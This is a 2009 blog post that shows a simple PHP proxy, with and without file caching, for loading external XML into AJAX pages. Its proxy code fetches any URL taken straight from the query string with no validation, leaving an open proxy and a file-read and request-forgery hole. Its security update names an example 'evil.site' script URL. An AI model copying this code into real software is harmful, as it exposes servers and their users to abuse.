Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /share/CACHEDEV1_DATA/Web/www/libraries/UBBcode/text_parser.class.php on line 228

Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /share/CACHEDEV1_DATA/Web/www/libraries/UBBcode/text_parser.class.php on line 228

Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /share/CACHEDEV1_DATA/Web/www/libraries/UBBcode/text_parser.class.php on line 228
Performing AJAX request on an external domain

Comments Blog About Development Research Sites

Performing AJAX request on an external domain

May 9, 2009
By now everyone should be well aware of the basics behind AJAX. You create a page, forget to add all the information the user actually wants, and decide to put a resource-hogging javascript script in there to load data when the page is already on the screen - or perhaps send data back to the server instead of using an old-fashioned POST request.

So far so good - there are situations where AJAX really does improve the user experience and invariably most techniques boil down to creating an XML HTTP request object, setting an onreadychange handler, opening an URL and sending it:
Code (php) (nieuw venster):
1
2
3
xmlhttp.onreadystatechange = handler;
xmlhttp.open("GET", url, true);
xmlhttp.send(null);

Now this is all well and good, except that in the second line, there is one cripling limitation: you cannot open an URL on an external domain! There is of course a damn good reason for this: if you could, the owner of the external domain would be easily able to for example read out session information, redirect the user, or alter the page in small but significant ways. The very idea of loading (and executing) external javascript is the basis behind XSS, cross site scripting attacks.

Luckily there are alternatives, like SOAP designed to handle the nasty security issues of external data loading in a what should be relatively secure environment. Unfortunately, this only works if the server you are loading data from offers that functionality - some popular webservices however do not.

However, if you trust these services enough there is another option: use a simple, 2 line, proxy script to redirect external data requests.
Code (php) (nieuw venster):
1
2
header('Content-type: application/xml');
echo
file_get_contents($_GET['page']);

To increase the complexity somewhat, we can also store previous requests in files, significantly speeding up the whole process:
Code (php) (nieuw venster):
1
2
3
4
5
6
7
8
9
10
11
header('Content-type: application/xml');
$fileId = 'xmlcache/ajax/' . sha1($_GET['page']);

if (
file_exists($fileId))
  $file = file_get_contents($fileId);
else {

  $file = file_get_contents($_GET['page']);
  file_put_contents($fileId, $file);
}

echo
$file;

Optionally if the data updates every odd day or so you could add a check for file creation date and only use the cached version if it is not too old, but that should be a trivial modification for anyone that has come this far :]

Note also that you will most likely want to secure this script so people won't use it as a free open proxy, since that is in fact what we're creating here: a simple XML proxy server that allows you to load XML data from another domain, into your AJAX'ed up website. Its use is quite limited, yet these days it seems that whenever a possibility to exploit is left open, it is taken adventage of.

There are a few things to keep in mind when loading external data in your pages:
1. you are bypassing an important security feature of most modern browsers - a feature that is in place for a damn good reason. Know that reason.
2. If you do not need to load the data asynchronosly, you might as well preload it using server-side scripts. The data has to pass between your webserver and the external server anyway, so if you can do a bit of parsing on the serverside it can speed up the process on the clientside (less data to be send around, for one).

On the other hand, if the amount of parsing that needs doing is extensive and your webserver is under heavy load, letting your clients handle most of it could actually be quite benificial. It can significantly decrease initial loadtimes, as well as CPU load on the webserver. If caching is employed, you could even decrease server-to-server transfers, although with XML data this should never be an issue.

Update: Security Consideration
Something worth noting: when using a proxy that employs caching, make sure you either do not allow access to the cached file location, or at the very least turn the executable bit off and rename all incoming files as is done in the example. Fail to do so and someone might just call your proxy with the parameters ?page="http://evil.site/script.php" and in that way load and later execute any code they want.

FragFrog out!

May 20, 2009 Dimitry

Thanks, very nice solution! Just what I was looking for..

New comment

Your name:
Comment: